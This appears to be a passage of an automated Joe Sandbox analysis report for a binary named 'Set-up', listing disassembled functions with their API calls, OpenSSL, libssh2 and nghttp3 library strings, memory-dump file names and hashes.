Opcode ID: 895c914d600930c625cd72acb6253817cd4a1cd598d9232e49c89f4d9ba4a2c4
Instruction ID: fcb8b876d205802443e27624c985cccec861b54c2d44fcde3cca6cb8d32ae281
Opcode Fuzzy Hash: 895c914d600930c625cd72acb6253817cd4a1cd598d9232e49c89f4d9ba4a2c4
Instruction Fuzzy Hash: 39A19171B40707ABE7208F6AD945B22BFE8BF44744F094538E918DB682FB75F9508B90

Function 0069E720 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 0069E9A3

Strings

BN_lshift, xrefs: 0069E7E2
, xrefs: 0069E992
crypto/bn/bn_shift.c, xrefs: 0069E7E9

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memset
String ID: $BN_lshift$crypto/bn/bn_shift.c
API String ID: 2221118986-2228461501
Opcode ID: 66af2d60716df51bee50d3516b0bb557ed9987a772d3b9c57f74877181739ed4
Instruction ID: e5d11d77ed4f1b8908265da7ce71360f80333b64fe05c287a0cb698b62135b0a
Opcode Fuzzy Hash: 66af2d60716df51bee50d3516b0bb557ed9987a772d3b9c57f74877181739ed4
Instruction Fuzzy Hash: B671E031A087108BCB15DF29C88062AF7A6EFDA310F04872EFDA967791D771AC02CB41

Function 00714870 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 179stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,006C05BF,00000000,00000000,input), ref: 00714986
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 007149D4

Strings

ossl_property_string, xrefs: 0071491C, 0071494F
crypto/property/property_string.c, xrefs: 00714926, 00714959, 0071499A, 007149F3, 00714A4D, 00714A72

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpystrlen
String ID: crypto/property/property_string.c$ossl_property_string
API String ID: 3412268980-3682758481
Opcode ID: 61237aecaae8f48d4c5494b05fed69c352eff75f6e538e5962734e0a3f8deace
Instruction ID: 4b49e3174cc2e37457f6159e564b6867ea4d7d67bd3bf307797d04f014d22b2a
Opcode Fuzzy Hash: 61237aecaae8f48d4c5494b05fed69c352eff75f6e538e5962734e0a3f8deace
Instruction Fuzzy Hash: 6B5128B6D443057BD7617B28AC03F6B76999F10718F080038FD48932A3FA66FA50C796

Function 00706590 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0070662C

Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8

Strings

crypto/ocsp/ocsp_vfy.c, xrefs: 007066B3, 007066ED, 00706767
ocsp_match_issuerid, xrefs: 007066A9, 007066E3, 0070675D

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcmp
String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
API String ID: 1653033214-3047229099
Opcode ID: 2a8db3038b562615d65aa3dd13a1822186415196705b46cb3c04c0420c570b33
Instruction ID: 195c09231daec0671de8acad9625b5c378d2a144f73a244ed757030e6b50bfdd
Opcode Fuzzy Hash: 2a8db3038b562615d65aa3dd13a1822186415196705b46cb3c04c0420c570b33
Instruction Fuzzy Hash: 51411BA5A44301F7E65035702C9BF6B31C9CF55758F18063CFE099A2D3FA99DA3482AB

Function 005D8710 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 005D8769
SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 005D87D1

Part of subcall function 005D88B0: QueryPerformanceFrequency.KERNEL32(?), ref: 005D88C1
Part of subcall function 005D88B0: QueryPerformanceCounter.KERNEL32(?), ref: 005D88CC

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
String ID:
API String ID: 3112449238-0
Opcode ID: 584a72cbba2518a1ec90bdaacd76e728278bcc5a19e3a8597ff01f2917bf07d9
Instruction ID: 60af183fa16be873d01b282035996c580a7fb0cea45be6fa9f9847a023854a08
Opcode Fuzzy Hash: 584a72cbba2518a1ec90bdaacd76e728278bcc5a19e3a8597ff01f2917bf07d9
Instruction Fuzzy Hash: 6331DAB2B00202ABE7149A79DC46B7A7B68FB80350F54493EEC16D7291DF31ED14D791

Function 006C60E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(006C7CCC,?,00000000,006C7127,006C7CCC,00000000,006ECAB7,00511A70), ref: 006C60E3
SetLastError.KERNEL32(00000000), ref: 006C61A5

Strings

crypto/err/err_local.h, xrefs: 006C620C, 006C6227, 006C6257
crypto/err/err.c, xrefs: 006C6275

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: crypto/err/err.c$crypto/err/err_local.h
API String ID: 1452528299-2963546075
Opcode ID: 28075e61e322f0b122cbe1e21ba9ea9feee90de071975bb66f0b458ac9e8df1e
Instruction ID: 2d49dea81488f132763645474f6b73fb2a0bd8da26e47a74e01fb889ab22a8a0
Opcode Fuzzy Hash: 28075e61e322f0b122cbe1e21ba9ea9feee90de071975bb66f0b458ac9e8df1e
Instruction Fuzzy Hash: D531E7B5A4070276E7612F2CEC47FB63352FB4471DF040238FA14552E7E7B9A924CAA9

Function 00540639 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00540646

Part of subcall function 005FF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,005400B0,?,?,00000000,00000000,?), ref: 005FF35D

Strings

vssh/libssh2.c, xrefs: 005406A7, 005406C9
Attempt to set SFTP stats failed: %s, xrefs: 00540700
Unknown error in libssh2, xrefs: 005406EE, 005406FF

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Attempt to set SFTP stats failed: %s$Unknown error in libssh2$vssh/libssh2.c
API String ID: 3014104814-2439779272
Opcode ID: dd38fa39c95ff5ce1dc7599d00938c67984e1948876b4bcaf05674b66d141754
Instruction ID: d42e1db1e233b8d5e9fb85fe83c982b0117aa39277a0ed33fd6be3cd595ba895
Opcode Fuzzy Hash: dd38fa39c95ff5ce1dc7599d00938c67984e1948876b4bcaf05674b66d141754
Instruction Fuzzy Hash: 1B31F1B1A04605AFD3119F18D845BAAFBE5BF88328F044528F5584B3A2E371BA14CB82

Function 00540584 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00540594

Part of subcall function 005FEE30: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005FEE4F

Strings

mkdir command failed: %s, xrefs: 0054062F
vssh/libssh2.c, xrefs: 005405F8
Unknown error in libssh2, xrefs: 0054061D, 0054062E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Unknown error in libssh2$mkdir command failed: %s$vssh/libssh2.c
API String ID: 3014104814-3060469362
Opcode ID: ea1641e12aef93b6feb4860bf7a20684752f7bd2055bbcb08812f034d37a9a88
Instruction ID: a9b4c832e6c8a9cb9794105217fc53e47767f6eb0642602b703a543f73d71384
Opcode Fuzzy Hash: ea1641e12aef93b6feb4860bf7a20684752f7bd2055bbcb08812f034d37a9a88
Instruction Fuzzy Hash: C121D8B5A04305AFD311DF68D88569AFBE5BF88324F044568F5588B352D371ED14CB92

Function 00684460 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,006871DD,00000000,?,?), ref: 006844AC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 006844FF

Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8

Strings

crypto/asn1/asn1_lib.c, xrefs: 00684487, 006844DB
ASN1_STRING_set, xrefs: 0068447D

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$strcpy$memcpy
String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
API String ID: 1223016426-1431402185
Opcode ID: f383c61a8b7468bd2bc50d20e5554185f61ef23cd06ba2928eb0de50d2094e03
Instruction ID: cf7c3ce326659d4627635e7661ad575fa144bd1e99fefb6afbfd21cebc15c2c8
Opcode Fuzzy Hash: f383c61a8b7468bd2bc50d20e5554185f61ef23cd06ba2928eb0de50d2094e03
Instruction Fuzzy Hash: 5111E6716043125BD7207D649841B6B76DADB51725F1902A9FD19AB3C2EE61DC0087F2

Function 005BC220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 005BC4E7

Strings

(size_t)(p - pbuf->last) == len, xrefs: 005BC4E2
nghttp3_qpack.c, xrefs: 005BC4DD

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-3384106985
Opcode ID: d760477a17c8f63967d7db553bcdac3503e653b98262edcbeef4525c13ea46df
Instruction ID: a0b89264e98d510ca8a8d5a920ba7ff9af4163ae57d19a5fe02b1fee843c30a1
Opcode Fuzzy Hash: d760477a17c8f63967d7db553bcdac3503e653b98262edcbeef4525c13ea46df
Instruction Fuzzy Hash: 6281C571A083009FD7049E2CC89076ABBD2FBD9714F548A7CF9998B3D2D675EC448785

Function 0069C950 Relevance: 5.4, APIs: 4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb912b9a000b708f7402aac0e254db19abf290027456a00c8c7cb84079dfeef
Instruction ID: 78dbe89598b7abcd9dd3f9c1c40e07e461296c9be9aa853cc6a3eb71e062d0f1
Opcode Fuzzy Hash: 9bb912b9a000b708f7402aac0e254db19abf290027456a00c8c7cb84079dfeef
Instruction Fuzzy Hash: 87D19EB2508205BFDB00AF58DC45E6BBBAEEFC5354F49482CF94553212E631ED15CBA2

Function 005BC520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,005BB434,?,?,00000000,00000000,?,?), ref: 005BC68A

Strings

(size_t)(p - rbuf->last) == len, xrefs: 005BC685
nghttp3_qpack.c, xrefs: 005BC680

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-2159148421
Opcode ID: 0040304b9f84921b93786772093c65ced34c0c76f610628c298672ab3ae28409
Instruction ID: 78e90d7c2609522e7e09fd906f07b234688a0dfe5847cd8bba5db6433cb3d156
Opcode Fuzzy Hash: 0040304b9f84921b93786772093c65ced34c0c76f610628c298672ab3ae28409
Instruction Fuzzy Hash: 4141F4717082004FD7099E28D890BAABFD6EFC9314F18857DE989CB392D935ED058785

Function 005C2600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 005C27D1

Strings

nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 005C27CC
nghttp3_qpack.c, xrefs: 005C27C7

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
